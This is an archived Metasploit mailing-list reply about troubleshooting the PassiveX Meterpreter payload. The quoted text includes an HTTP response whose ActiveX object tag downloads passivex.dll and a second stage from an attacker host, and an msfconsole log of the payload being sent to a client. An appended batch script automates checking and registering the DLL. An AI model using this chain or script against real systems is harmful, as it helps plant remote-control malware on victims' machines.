[framework] Using the PassiveX payload

mmiller at hick.org mmiller at hick.org
Fri May 5 10:00:27 CDT 2006


On Fri, May 05, 2006 at 11:11:43AM +0200, Feature Meister wrote:
> Hi,
> 
> it seems as if the control does not get registered. At least there's
> nothing like a "PassiveX.PassiveX" or "CPassiveX" registered under
> HKEY_CLASSES_ROOT.
> The account I am trying it with has administrative privileges.

<snip>

> 3rd response:
> HTTP/1.1 200 OK
> Connection: close
> Content-type: text/html
> 
> <html><object classid="CLSID:B3AC7307-FEAE-4e43-B2D6-161E68ABA838"
> codebase="http://192.168.71.75:8000/passivex.dll#-1,-1,-1,-1"><param
> name="HttpHost" value="192.168.71.75"><param name="HttpPort"
> value="8000"><param name="DownloadSecondStage"
> value="1"></object></html>
> ============================================================
> 4th request (C -> 192.168.71.75:8000):
> GET /passivex.dll HTTP/1.1

<snip>

> on MSFConsole I see:
> 
> msf ie_xp_pfv_metafile(win32_passivex_meterpreter) > exploit
> [*] Starting PassiveX Handler on 192.168.71.75:8000.
> [*] Waiting for connections to http://192.168.71.75:80/
> [*] HTTP Client connected from 192.168.71.71:1078, redirecting...
> [*] HTTP Client connected from 192.168.71.71:1079, sending 1452 bytes
> of payload...
> [*] Sending PassiveX main page to client...
> [*] Sending PassiveX DLL in HTTP response (106496 bytes)...

This looks like the correct series of events to me.  The next thing to
check is whether or not the passivex.dll is in the Downloaded Program
Files folder (%WINDIR%\Downloaded Program Files).  You'll need to browse
there from a cmd prompt, not from Explorer.  If it's there, try to run
the following command:

"regsvr32 passivex.dll"

If the command succeeds, check in the registry again under
HKEY_CLASSES_ROOT for the class name.  If it doesn't, note the error and
send it back over to us.  As far as I know, PassiveX has no
non-standard DLL dependencies, so it should register without issue.  If
the file is not there (be sure to check in CONFLICT.x folders too just
in case), then something is going on that is causing it not to download
properly.  
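The checks above, collected into one script, as an added example that is not part of the original mail or of the Metasploit PassiveX code. It assumes the DLL is named passivex.dll (as in the quoted GET request), that the control's CLSID is the one in the quoted <object> tag ({B3AC7307-FEAE-4e43-B2D6-161E68ABA838}), and that reg.exe is available; it runs from the same cmd prompt the reply recommends, because Explorer shows a shell-namespace view of Downloaded Program Files rather than the real directory contents.

```batch
@echo off
rem Added example (not from the original mail): walks through the PassiveX
rem registration checks described above.  Run from an administrative cmd prompt.
setlocal enabledelayedexpansion
set "DPF=%WINDIR%\Downloaded Program Files"
rem CLSID taken from the quoted <object classid="..."> tag; assumed to be PassiveX's.
set "CLSID={B3AC7307-FEAE-4e43-B2D6-161E68ABA838}"
set "FOUND="

rem 1. Is the DLL in the Downloaded Program Files folder itself?
if exist "%DPF%\passivex.dll" set "FOUND=%DPF%\passivex.dll"

rem 2. Also look in CONFLICT.x subfolders, which IE creates when it cannot
rem    overwrite an earlier copy of a downloaded control.
for /d %%D in ("%DPF%\CONFLICT.*") do (
    if exist "%%~D\passivex.dll" if not defined FOUND set "FOUND=%%~D\passivex.dll"
)

if not defined FOUND (
    echo passivex.dll was NOT found under "%DPF%" or any CONFLICT.x folder.
    echo The DLL is not being downloaded; look at the HTTP exchange for /passivex.dll.
    exit /b 2
)
echo Found: "!FOUND!"

rem 3. Try to register it by hand.  /s suppresses the message box; the exit
rem    code still reports failure (e.g. LoadLibrary or DllRegisterServer failed).
regsvr32 /s "!FOUND!"
if errorlevel 1 (
    echo regsvr32 failed with exit code !errorlevel! -- rerun without /s to read the error.
    exit /b 3
)

rem 4. Confirm the CLSID now resolves under HKEY_CLASSES_ROOT (InprocServer32
rem    points at the DLL that will be loaded into the browser process).
reg query "HKCR\CLSID\%CLSID%\InprocServer32" >nul 2>&1
if errorlevel 1 (
    echo regsvr32 reported success, but HKCR\CLSID\%CLSID% is still missing.
    exit /b 4
)
echo Registered: HKCR\CLSID\%CLSID%
reg query "HKCR\CLSID\%CLSID%\InprocServer32"
endlocal
```

Exit code 2 means the download never produced a file, 3 means the file is there but regsvr32 rejected it (the error text is what the reply asks to be sent back), and 4 means registration claimed success yet the CLSID key is absent, which points at the registry rather than the DLL.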


